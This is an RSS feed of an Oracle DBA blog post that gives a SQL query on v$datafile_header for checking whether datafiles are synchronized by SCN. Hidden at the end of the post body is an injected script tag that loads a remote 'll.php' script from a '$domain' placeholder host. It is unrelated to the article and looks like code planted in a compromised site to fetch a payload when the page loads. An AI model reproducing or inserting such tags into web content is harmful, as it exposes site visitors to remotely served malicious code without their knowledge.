<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; How to determine whether the datafiles are synchronized or not</title>
	<atom:link href="http://www.bestremotedba.com/tag/how-to-determine-whether-the-datafiles-are-synchronized-or-not/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to determine whether the datafiles are synchronized or not</title>
		<link>http://www.bestremotedba.com/how-to-determine-whether-the-datafiles-are-synchronized-or-not/</link>
		<comments>http://www.bestremotedba.com/how-to-determine-whether-the-datafiles-are-synchronized-or-not/#comments</comments>
		<pubDate>Wed, 17 Feb 2010 07:30:15 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Restore and Recovery]]></category>
		<category><![CDATA[How to determine whether the datafiles are synchronized or not]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=561</guid>
		<description><![CDATA[How to determine whether the datafiles are synchronized or not]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>select status, checkpoint_change#,<br />
       to_char(checkpoint_time, &#8216;DD-MON-YYYY HH24:MI:SS&#8217;) as checkpoint_time,<br />
       count(*)<br />
from v$datafile_header<br />
group by status, checkpoint_change#, checkpoint_time<br />
order by status, checkpoint_change#, checkpoint_time;</p>
<p>Check the results of the above query If it return one and only one row for the online datafiles, means they are already synchronized in terms of their SCN. Otherwise the datafiles are still not synchronized yet.<br />
<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/how-to-determine-whether-the-datafiles-are-synchronized-or-not/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

